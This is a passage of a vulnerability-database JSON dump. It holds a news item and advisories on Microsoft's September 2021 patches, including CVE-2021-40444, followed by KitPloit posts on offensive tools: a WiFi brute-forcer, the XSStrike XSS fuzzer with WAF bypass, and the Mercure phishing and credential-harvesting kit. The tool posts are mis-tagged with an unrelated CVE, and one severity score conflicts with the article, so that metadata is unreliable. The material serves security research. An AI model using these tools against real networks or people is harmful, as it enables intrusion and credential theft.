zero-day](<https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html>) in its MSHTML Platform that came to light last week. \n\nOf the 66 flaws, three are rated Critical, 62 are rated Important, and one is rated Moderate in severity. This is aside from the [20 vulnerabilities](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Microsoft Edge browser that the company addressed since the start of the month.\n\nThe most important of the updates concerns a patch for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>) (CVSS score: 8.8), an actively exploited remote code execution vulnerability in MSHTML that leverages malware-laced Microsoft Office documents, with EXPMON researchers noting \"the exploit uses logical flaws so the exploitation is perfectly reliable.\"\n\nAlso addressed is a publicly disclosed, but not actively exploited, zero-day flaw in Windows DNS. Designated as [CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>), the elevation of privilege vulnerability is rated 7.8 in severity.\n\nOther flaws of note resolved by Microsoft involve a number of remote code execution bugs in Open Management Infrastructure ([CVE-2021-38647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647>)), Windows WLAN AutoConfig Service ([CVE-2021-36965](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965>)), Office ([CVE-2021-38659](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38659>)), Visual Studio ([CVE-2021-36952](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36952>)), and Word ([CVE-2021-38656](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38656>)) as well as a memory corruption flaw in Windows Scripting Engine ([CVE-2021-26435](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26435>))\n\nWhat's more, the Windows maker has rectified three privilege escalation flaws newly uncovered in its Print Spooler service ([CVE-2021-38667](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667>), [CVE-2021-38671](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671>), and [CVE-2021-40447](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447>)), while [CVE-2021-36975](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975>) and [CVE-2021-38639](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639>) (CVSS scores: 7.8), both of which relate to an elevation of privilege vulnerabilities in Win32k, are listed as 'exploitation more likely,' making it imperative that users move quickly to apply the security updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-09-01>)\n * [Apple](<https://thehackernews.com/2021/09/apple-issues-urgent-updates-to-fix-new.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-September/thread.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T05:00:00", "type": "thn", "title": "Microsoft Releases Patch for Actively Exploited Windows Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36952", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36975", "CVE-2021-38639", "CVE-2021-38647", "CVE-2021-38656", "CVE-2021-38659", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2021-09-15T05:00:22", "id": "THN:67ECC712AB360F5A56F2434CDBF6B51F", "href": "https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:55", "description": "A remote code execution vulnerability exists in Microsoft Internet Explorer MSHTML. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer MSHTML Remote Code Execution (CVE-2021-40444)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T00:00:00", "id": "CPAI-2021-0554", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows, Server (spec. IE) All Arbitrary Code Execution", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-40444", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2021-09-21T01:08:55", "description": "[  ](<https://4.bp.blogspot.com/-xvB75HZoGyw/WXipGd6I8sI/AAAAAAAAIY8/cfrIns4l0U46vmwpW4jIfyyZqB3F6990gCLcBGAs/s1600/wifi-bruteforcer.jpg>)\n\n \n** WARNING: ** This project is still under development and by installing the app may misconfigure the Wi-Fi settings of your Android OS, a system restore may be necessary to fix it. \n \nAndroid application to brute force WiFi passwords without requiring a rooted device. \n \n\n\n** [ Download WiFi Bruteforcer ](<https://github.com/faizann24/wifi-bruteforcer-fsecurify>) **\n", "cvss3": {}, "published": "2017-08-04T22:12:00", "type": "kitploit", "title": "WiFi Bruteforcer - Android application to brute force WiFi passwords (No Root Required)", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-04T22:12:00", "id": "KITPLOIT:1624142243530526923", "href": "http://www.kitploit.com/2017/08/wifi-bruteforcer-android-application-to.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-21T03:08:41", "description": "Faraday is the ** Integrated Multiuser Risk Environment ** you were looking for! It maps and leverages all the knowledge you generate ** in real time ** , letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the ** impact and risk ** being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to ** re-use the available tools in the community ** taking advantage of them in a collaborative way! \n\n \n\n\n#### Managing your assessments \n\nIn the last couple of versions we added several features to allow our users to manage more and more parts of their engagements directly from our platform so we realized, why not also add the option to manage methodologies and tasks? And so we did! \n\n \n\n\n \n \n \nKanban Tasks View \n\n\n \n\n\nNow you can create your custom methodologies, add tasks, tag them and keep track of your whole project directly from Faraday. \n\n#### Improving the Data Analysis tools \n\nAs per your requests, we made some ** changes to the existing Data Analysis tools ** introduced [ in the last release ](<https://t.umblr.com/redirect?z=http%3A%2F%2Fblog.infobytesec.com%2F2017%2F05%2Fa-brand-new-faraday-version-is-ready.html&t=MmY2ZGZiYzNiN2U3ZTc1ZjJlNTM2ODdhZGEzZDA4YmM2YmUwYTA3MyxhS0puRFRzNg%3D%3D&b=t%3A9lMgVrldXxD4iFATXLExSw&p=https%3A%2F%2Fwww.tumblr.com%2Fblog%2Fblackploit%2Fsubmissions%3F163713401737&m=1>) . We added the possibility to change data configuration in order to customize charts, a new bar chart type to show most vulnerable services and a filter for ** undefined ** or ** null ** values. \n\n \n\n\n \n \n \nMost vulnerable services \n \n \n \n \nModal to set chart properties \n \n \n \n \nCharts customization \n\n\n#### Executive Report clean up \n\nSome users reported issues with the sorting of Hosts and Evidence in the reports. We fixed it so the hosts in grouped reports are sorted by IP and evidence is sorted by alphabetically by name. \n\n \n \n \n \nTargets are sorted by IP \n \n \n \n \nEvidence names sorted alphabetically \n \nWe know sometimes it is necessary to use special characters for evidence names. Some of our users \n\n\n#### Web UI \n\nNow you can manually create the same vulnerability in several hosts at once! Select as many targets as you want when creating your vulns. \n \n \n \n \nAdd vuln to multiple targets at once \n \nAlso, we made the vulnerability creation modal more consistent with the rest of the views by starting the pagination of the targets in page 1 instead of 0. \n\n\n### Changes: \n\n * Improved Data analysis charts. Added more chart properties and data binding \n * Improved target ordering in grouped reports \n * Fixed bug with new line character in reports DOCX \n * Adds alphabetical sort for Evidence in the Executive Report \n * Fix bug updating users with no roles \n * Fixed report creation with evidence names containing special chars \n * Added Tasks Management to the Web UI \n * Added the ability to select more than one target when creating a vuln in the Web UI \n * [ Merged PR #182 ](<https://t.umblr.com/redirect?z=https%3A%2F%2Fgithub.com%2Finfobyte%2Ffaraday%2Fpull%2F182&t=OWFjOWZkNmIwYmViZjZhOGI4MmIzZGI0ZmY0OTE4YjY0MDI3NzdjMyxhS0puRFRzNg%3D%3D&b=t%3A9lMgVrldXxD4iFATXLExSw&p=https%3A%2F%2Fwww.tumblr.com%2Fblog%2Fblackploit%2Fsubmissions%3F163713401737&m=1>) \\- problems with zonatransfer.me \n * Fixed bug in Download CSV of Status report with old versions of Firefox \n * Fixed formula injection vulnerability in export to CSV feature \n * Fixed DOM-based XSS in the Top Services widget of the dashboard \n * Fix in AppScan plugin \n \n\n * Fix HTML injection in Vulnerability template \n * Add new plugin: Junit XML \n \n\n * Improved pagination in new vuln modal of status report \n * Added \u201cPolicy Violations\u201d field for Vulnerabilities \n\n \n\n\n** [ https://www.faradaysec.com/ ](<https://goo.gl/VvzfSv>) \n[ https://github.com/infobyte/faraday ](<https://github.com/infobyte/faraday>) \n[ https://twitter.com/faradaysec ](<https://twitter.com/faradaysec>) \n[ https://forum.faradaysec.com/ ](<https://forum.faradaysec.com/>) \n[ https://www.faradaysec.com/ideas ](<https://www.faradaysec.com/ideas>) **\n", "cvss3": {}, "published": "2017-08-02T22:47:04", "type": "kitploit", "title": "Faraday v2.6 - Collaborative Penetration Test and Vulnerability Management Platform", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-02T22:47:04", "id": "KITPLOIT:942518396640901655", "href": "http://www.kitploit.com/2017/08/faraday-v26-collaborative-penetration.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-20T08:38:14", "description": "[  ](<https://1.bp.blogspot.com/-v_w7OvujSF4/WYDvU1PzCPI/AAAAAAAAIbE/LmWC0wm0z-ED0TzSsRDTPX6pgHwMKSCzACLcBGAs/s1600/XSStrike_01.png>)\n\n \nXSStrike is a python script designed to detect and exploit XSS vulnerabilites. \nA list of features XSStrike has to offer: \n\n\n * Fuzzes a parameter and builds a suitable payload \n * Bruteforces paramteres with payloads \n * Has an inbuilt crawler like functionality \n * Can reverse engineer the rules of a WAF/Filter \n * Detects and tries to bypass WAFs \n * Both GET and POST support \n * Most of the payloads are hand crafted \n * Negligible number of false positives \n * Opens the POC in a browser window \n \n** Installing XSStrike ** \n \nUse the following command to download it \n\n \n \n git clone https://github.com/UltimateHackers/XSStrike/\n\nAfter downloading, navigate to XSStrike directory with the following command \n\n \n \n cd XSStrike\n\nNow install the required modules with the following command \n\n \n \n pip install -r requirements.txt\n\nNow you are good to go! Run XSStrike with the following command \n\n \n \n python xsstrike\n\n \n** Using XSStrike ** \n \n\n\n[  ](<https://3.bp.blogspot.com/-C0-vzsr3V44/WYDvUxulvNI/AAAAAAAAIbI/KqgbxKt4BJoBU3I-Q61a8C5hNSWmrFAsgCEwYBhgL/s1600/XSStrike_02.png>)\n\n \nYou can enter your target URL now but remember, you have to mark the most crucial parameter by inserting \"d3v<\" in it. \nFor example: target.com/search.php?q=d3v&category=1 \nAfter you enter your target URL, XSStrike will check if the target is protected by a WAF or not. If its not protected by WAF you will get three options \n \n** 1\\. Fuzzer: ** It checks how the input gets reflected in the webpage and then tries to build a payload according to that. \n \n\n\n[  ](<https://4.bp.blogspot.com/-b-2wa0szDlk/WYDvVGvBrmI/AAAAAAAAIbM/8gb1cTXgY74mN1xBfgrLae8uXUb1kyDXQCEwYBhgL/s1600/XSStrike_03.png>)\n\n \n** 2\\. Striker: ** It bruteforces all the parameters one by one and generates the proof of concept in a browser window. \n \n\n\n[  ](<https://4.bp.blogspot.com/-T55ehl8fICw/WYDvVuhjMiI/AAAAAAAAIbQ/joigYEvavUYkyE7SEBuZrVy3CPCdAoE7QCEwYBhgL/s1600/XSStrike_04.png>)\n\n \n** 3\\. Spider: ** It extracts all the links present in homepage of the target and checks parameters in them for XSS. \n \n\n\n[  ](<https://1.bp.blogspot.com/-ivkeIihQquQ/WYDvVzl8vkI/AAAAAAAAIbU/Hf96o86NMJUeEjtAObB-_U8RmBqFJQ71QCEwYBhgL/s1600/XSStrike_05.png>)\n\n \n** 4\\. Hulk: ** Hulk uses a different approach, it doesn't care about reflection of input. It has a list of polyglots and solid payloads, it just enters them one by one in the target parameter and opens the resulted URL in a browser window. \n \n \n\n\n[  ](<https://3.bp.blogspot.com/-v61mJbfoFjE/WYDvWbpEizI/AAAAAAAAIbY/2M9ZzdU_f7INSrgT8vB3NQQJURC2_xZTgCEwYBhgL/s1600/XSStrike_06.png>)\n\n \nXSStrike can also bypass WAFs \n \n\n\n[  ](<https://4.bp.blogspot.com/-D0gqGYmVVtc/WYDvWk-A_RI/AAAAAAAAIbc/GhOKd4hRT3oqCqyjJUIqvsvaCLe5vQ9swCEwYBhgL/s1600/XSStrike_07.png>)\n\n \nXSStrike supports POST method too \n \n\n\n[  ](<https://4.bp.blogspot.com/-qV5E0QeP4BQ/WYDvWyNOWGI/AAAAAAAAIbg/zBhmbV96wdoyhDGb8IfQxF3SgpxP9qA-gCEwYBhgL/s1600/XSStrike_08.png>)\n\n \nYou can also supply cookies to XSStrike \n \n\n\n[  ](<https://2.bp.blogspot.com/-JlM-1OEJu5w/WYDvXVSuF_I/AAAAAAAAIbk/YZHiAJ3xUlQMrHuPrfDXthvS62hidbPnACEwYBhgL/s1600/XSStrike_09.png>)\n\n \n** Demo video ** \n\n\n \n\n\n \n** Credits ** \nXSStrike uses code from [ BruteXSS ](<https://github.com/shawarkhanethicalhacker/BruteXSS>) and [ Intellifuzzer-XSS ](<https://github.com/matthewdfuller/intellifuzz-xss>) , [ XsSCan ](<https://github.com/The404Hacking/XsSCan>) . \n \n \n\n\n** [ Download XSStrike ](<https://github.com/UltimateHackers/XSStrike>) **\n", "cvss3": {}, "published": "2017-08-01T22:15:22", "type": "kitploit", "title": "XSStrike v1.2 - Fuzz, Crawl and Bruteforce Parameters for XSS", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-01T22:15:22", "id": "KITPLOIT:698315176468431184", "href": "http://www.kitploit.com/2017/08/xsstrike-v12-fuzz-crawl-and-bruteforce.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-21T03:06:13", "description": "The Universal Radio Hacker is a software for investigating unknown wireless protocols. Features include \n\n\n * ** hardware interfaces ** for common Software Defined Radios \n * ** easy demodulation ** of signals \n * ** assigning participants ** to keep overview of your data \n * ** customizable decodings ** to crack even sophisticated encodings like CC1101 data whitening \n * ** assign labels ** to reveal the logic of the protocol \n * ** fuzzing component ** to find security leaks \n * ** modulation support ** to inject the data back into the system \nCheck out the [ wiki ](<https://github.com/jopohl/urh/wiki>) for more information and supported devices. \n \n** Video ** \n \n\n\n \n** Installation ** \nUniversal Radio Hacker can be installed via _ pip _ or using the _ package manager _ of your distribution (if included). Furthermore, you can [ install urh from source ](<https://draft.blogger.com/blogger.g?blogID=8317222231133660547#installing-from-source>) or run it [ without installation ](<https://draft.blogger.com/blogger.g?blogID=8317222231133660547#without-installation>) directly from source. \n \n** Dependencies ** \n\n\n * Python 3.4+ \n * numpy / psutil / zmq \n * PyQt5 \n * C++ Compiler \n** Optional ** \n\n\n * librtlsdr (for native RTL-SDR device backend) \n * libhackrf (for native HackRF device backend) \n * libairspy (for native AirSPy device backend) \n * liblimesdr (for native LimeSDR device backend) \n * libuhd (for native USRP device backend) \n * rfcat (for RfCat plugin to send e.g. with YardStick One) \n * gnuradio / gnuradio-osmosdr (for GNU Radio device backends) \n \n** Installation examples ** \n \n** Arch Linux ** \n\n \n \n yaourt -S urh\n\n \n** Ubuntu/Debian ** \nIf you want to use native device backends, make sure you install the ** -dev ** package for your desired SDRs, that is: \n\n\n * AirSpy: ` libairspy-dev `\n * HackRF: ` libhackrf-dev `\n * RTL-SDR: ` librtlsdr-dev `\n * USRP: ` libuhd-dev `\nIf your device does not have a ` -dev ` package, e.g. LimeSDR, you need to manually create a symlink to the ` .so ` , like this: \n\n \n \n sudo ln -s /usr/lib/x86_64-linux-gnu/libLimeSuite.so.17.02.2 /usr/lib/x86_64-linux-gnu/libLimeSuite.so\n\n** before ** installing URH, using: \n\n \n \n sudo apt-get update\n sudo apt-get install python3-numpy python3-psutil python3-zmq python3-pyqt5 g++ libpython3-dev python3-pip\n sudo pip3 install urh\n\n \n** Gentoo/Pentoo ** \n\n \n \n emerge -av urh\n\n \n** Fedora 25+ ** \n\n \n \n dnf install urh\n\n \n** Windows ** \nIf you run Python 3.4 on Windows you need to install [ Visual C++ Build Tools 2015 ](<http://landinghub.visualstudio.com/visual-cpp-build-tools>) first. \n** It is recommended to use Python 3.5 or later on Windows, so no C++ compiler needs to be installed. ** \n\n\n 1. Install [ Python 3 for Windows ](<https://www.python.org/downloads/windows/>) . \n * Make sure you tick the _ Add Python to PATH _ checkbox on first page in Python installer. \n * Choose a ** 64 Bit ** Python version for native device support. \n 2. In a terminal, type: ` pip install urh ` . \n 3. Type ` urh ` in a terminal or search for ` urh ` in search bar to start the application. \n \n** Mac OS X ** \n\n\n 1. Install [ Python 3 for Mac OS X ](<https://www.python.org/downloads/mac-osx/>) . _ If you experience issues with preinstalled Python, make sure you update to a recent version using the given link. _\n 2. (Optional) Install desired native libs e.g. ` brew install librtlsdr ` for corresponding native device support. \n 3. In a terminal, type: ` pip3 install urh ` . \n 4. Type ` urh ` in a terminal to get it started. \n \n** Update your installation ** \nIf you installed URH via pip you can keep it up to date with \n\n \n \n pip3 install --upgrade urh\n\nIf this shouldn't work you can try: \n\n \n \n python3 -m pip install --upgrade urh\n\n \n** Running from source ** \nIf you like to live on bleeding edge, you can run URH from source. \n \n** Without installation ** \nTo execute the Universal Radio Hacker without installation, just run: \n\n \n \n git clone https://github.com/jopohl/urh/\n cd urh/src/urh\n ./main.py\n\nNote, before first usage the C++ extensions will be built. \n \n** Installing from source ** \nTo install from source you need to have ` python-setuptools ` installed. You can get it e.g. with ` pip install setuptools ` . Once the setuptools are installed use: \n\n \n \n git clone https://github.com/jopohl/urh/\n cd urh\n python setup.py install\n\nAnd start the application by typing ` urh ` in a terminal. \n \n** External decodings ** \nSee [ wiki ](<https://github.com/jopohl/urh/wiki/External-decodings>) for a list of external decodings provided by our community! Thanks for that! \n \n** Screenshots ** \n \n** Get the data out of raw signals ** \n\n\n[  ](<https://4.bp.blogspot.com/-Sck3GcOdQHw/WXirAGg2aMI/AAAAAAAAIZI/iMVDhN3nw7wNIITsxosCfXtLbUD6KA3SwCLcBGAs/s1600/urh_01.png>)\n\n \n** Keep an overview even on complex protocols ** \n\n\n[  ](<https://1.bp.blogspot.com/-UqgO1YxfFig/WXirEEyDJBI/AAAAAAAAIZM/ko15nk0LFWw6QNG25BzmmMmxfMt5BKZUQCLcBGAs/s1600/urh_02.png>)\n\n \n** Record and send signals ** \n\n\n[  ](<https://1.bp.blogspot.com/-W2AUxqplt74/WXirHYKRG5I/AAAAAAAAIZQ/KDqaxuiXk1Ag-IUObggaIMmXOxIo5czuQCLcBGAs/s1600/urh_03.png>)\n\n \n \n\n\n** [ Download Universal Radio Hacker ](<https://github.com/jopohl/urh>) **\n", "cvss3": {}, "published": "2017-08-04T14:11:01", "type": "kitploit", "title": "Universal Radio Hacker - Investigate Wireless Protocols Like A Boss", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-04T14:11:01", "id": "KITPLOIT:5187040326820919368", "href": "http://www.kitploit.com/2017/08/universal-radio-hacker-investigate.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-21T03:02:47", "description": "Mercure is a tool for security managers who want to teach their colleagues about phishing. \n \n** What Mercure can do: ** \n\n\n * Create email templates \n * Create target lists \n * Create landing pages \n * Handle attachments \n * Let you keep track in the Campaign dashboard \n * Track email reads, landing page visits and attachment execution. \n * Harvest credentials \n \n** What Mercure will do: ** \n\n\n * Display more graphs (we like graphs!) \n * Provide a REST API \n * Allow for multi-message campaigns (aka scenarios) \n * Check browser plugins \n * User training \n \n** Docker Quickstart ** \n \n** Requirements ** \n\n\n * docker \n \n** Available configuration ** \nEnvironment variable name | Status | Description | Value example \n---|---|---|--- \nSECRET_KEY | Required | Django secret key | Random string \nURL | Required | Mercure URL | [ https://mercure.example.com ](<https://mercure.example.com/>) \nEMAIL_HOST | Required | SMTP server | mail.example.com \nEMAIL_PORT | Optional | SMTP port | 587 \nEMAIL_HOST_USER | Optional | SMTP user | [email protected] \nEMAIL_HOST_PASSWORD | Optional | SMTP password | [email protected] \nDEBUG | Optional | Run on debug mode | True \nSENTRY_DSN | Optional | Send debug info to sentry.io | [ https://23xxx: [email protected] /1234 ](<https://23xxx:38xxx@sentry.io/1234>) \nAXES_LOCK_OUT_AT_FAILURE | Optional | Ban on forcebrute login | True \nAXES_COOLOFF_TIME | Optional | Ban duration on forcebrute login (in hours) | 0.8333 \nDONT_SERVES_STATIC_FILE | Optional | Don't serve static files with django | True \n \n** Sample deployment ** \n\n \n \n # create container\n docker run \\\n -d \\\n --name=mercure \\\n -e SECRET_KEY=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 200 | head -n 1) \\\n -e URL=https://mercure.example.com \\\n -e EMAIL_HOST=mail.example.com \\\n -e EMAIL_PORT=587 \\\n -e [email\u00a0protected] \\\n -e [email\u00a0protected] \\\n synhackfr/mercure\n \n # create super user\n docker exec -it mercure python manage.py createsuperuser\n\n \n** Git Quickstart ** \n \n** Requirements ** \n\n\n * python3 \n * pip \n \n** Deployment ** \n\n \n \n git clone [email\u00a0protected]:synhack/mercure.git && cd mercure\n pip install -r requirements.txt\n ./manage.py makemigrations\n ./manage.py migrate\n ./manage.py collectstatic\n ./manage.py createsuperuser\n ./manage.py runserver\n\n \n** How to use mercure ** \nWe can consider mercure is divide between 4 categories : \n\n\n * Targets \n * Email Templates \n * Attachments and landing page \n * Campaigns \nTargets, Email Templates and Campaign are the minimum required to run a basic phishing campaign. \n\n\n 1. First, add your targets \n\n\n[  ](<https://3.bp.blogspot.com/-T9iIFdtr0_k/WXgiP7FRcDI/AAAAAAAAIWY/m5LxqiB77ao9KNzJPztaUNIPhN97jvIQACLcBGAs/s1600/mercure_01.png>)\n\nYou need to fill mercure name, the target email.Target first and last name are optional, but can be usefull to the landing page \n\n 2. Then, fill the email template. \n\n\n[  ](<https://1.bp.blogspot.com/-kjiY-oeHyXo/WXgiYRRu-_I/AAAAAAAAIWc/Z6CnGm0vIZEucfg5lAwOC0uFwTnj38_lQCLcBGAs/s1600/mercure_02.png>)\n\nYou need to fill the mercure name, the subject, the send and the email content. To improve the email quality, you have to fill the email content HTML and the text content. To get information about opened email, check \"Add open email tracker\" You can be helped with \"Variables\" category. \nAttachments and landing page are optionnal, we will see it after. \n\n 3. Finally, launch the campaign \n\n\n[  ](<https://2.bp.blogspot.com/-_AmBGJJbRDE/WXgicY5na7I/AAAAAAAAIWg/A6P4R8UPFxMzwPDLd6c1KTWBkv6pg52pwCLcBGAs/s1600/mercure_03.png>)\n\nYou need to fill the mercure name, select the email template and the target group. You can select the SMTP credentials, SSL using or URL minimazing \n\n 4. Optional, add landing page \n\n\n[  ](<https://3.bp.blogspot.com/-P0-2sk8bOLE/WXgihLoBidI/AAAAAAAAIWk/tEkFvsa6zwQSIjV4V-YNETggiOpo6jnDgCLcBGAs/s1600/mercure_04.png>)\n\nYou need to fill the mercure name, the domain to use You can use \"Import from URL\" to copy an existing website. \nYou have to fill the page content with text and HTML content by clicking to \"Source\" \n\n 5. Optional, add Attachment \n\n\n[  ](<https://2.bp.blogspot.com/-zTkgPNw2gqA/WXgil0Sai0I/AAAAAAAAIWo/HhrkdF7xcgEXxwEpAJQ9OV9YLSrV2ylugCLcBGAs/s1600/mercure_05.png>)\n\nYou need to fill the mercure name, the file name which appears in the email and the file You also have to check if the the file is buildable or not, if you need to compute a file for example. \nTo execute the build , you need to create a zip archive which contain a build script (named 'generator.sh' and a buildable file \n \n\n\n** [ Download Mercure ](<https://github.com/synhack/mercure>) **\n", "cvss3": {}, "published": "2017-08-03T22:49:09", "type": "kitploit", "title": "Mercure - A Tool For Security Managers Who Want To Train Their Colleague To Phishing", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-03T22:49:09", "id": "KITPLOIT:4033244480100620751", "href": "http://www.kitploit.com/2017/08/mercure-tool-for-security-managers-who.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-20T22:39:40", "description": "[  ](<https://2.bp.blogspot.com/-Y6JS7G2qSEY/WYE0RzV5iPI/AAAAAAAAIcE/a0xxwoL0lgkMobeo94eAZ5KYEbGRcelOwCLcBGAs/s1600/nmap.png>)\n\n \n\n\nNmap (\"Network Mapper\") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer ( [ Zenmap ](<https://nmap.org/zenmap/>) ), a flexible data transfer, redirection, and debugging tool ( [ Ncat ](<https://nmap.org/ncat/>) ), a utility for comparing scan results 